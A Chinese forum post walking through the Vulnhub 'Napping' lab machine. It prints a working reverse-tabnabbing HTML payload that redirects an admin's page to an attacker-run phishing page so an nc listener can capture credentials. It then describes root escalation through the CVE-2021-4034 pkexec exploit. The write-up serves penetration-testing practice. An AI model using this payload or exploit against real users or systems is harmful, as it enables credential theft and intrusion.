电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 652 人浏览分享

Vulnhub_Napping

[复制链接]
652 0
主机信息

kali:192.168.3.76

napping:192.168.31.47

信息收集

使用Nmap探测目标主机发现开放22、80两个端口

nmap -A -p- 192.168.31.47

QQ截图20220531113800.png

访问80端口发现是一个登录页和一个注册页

QQ截图20220531113833.png

QQ截图20220531113905.png

查看这两个网页的源码没有发现有价值的信息

9999.png

9998.png

尝试注册一个账户,登录后发现存在一个输入框

9996.png

输入后会生成一个超链接点击会进行跳转

9995.png

根据网页的描述,在输入一个网址之后,管理员会进行审核,且这种生成的URL容易存在tabnabbing攻击

9994.png

漏洞利用

首先从真网站下载一个网页

wget http://192.168.31.47/index.php

9993.png

然后再创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html)

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
        if(window.opener  != window) window.opener.parent.location.replac
e('http://192.168.31.76:8080/index.html');
    </script>
</body>
</html>

然后在网页目录下使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口在正常网页中填写构
造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码

9992.png

使用这个密码登录web界面,发现密码错误

9991.png

然后尝试ssh登录,发现可以登录成功

9990.png

查看daniel用户的家目录没有发现有用的信息

8889.png

然后查看adrian用户家目录下存在三个文件

QQ截图20220531114733.png

第一个是判断网站是否正常启动,并打印时间

8888.png

这个文件为query.py脚本执行写入的log文件

8887.png

查看user.txt发现没有权限

8886.png

提权

查看系统版本分析该网站可能存在CVE-2021-4034 polkit的pkexec本地权限提升漏洞

8885.png

然后查看gcc是否存在和版本号

8884.png

将cve-2021-4034漏洞的poc下载到服务器后,使用gcc进行编译

8883.png

查看编译后文件

1829.png

执行编译文件获得root权限

26.png

查看flag

100.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.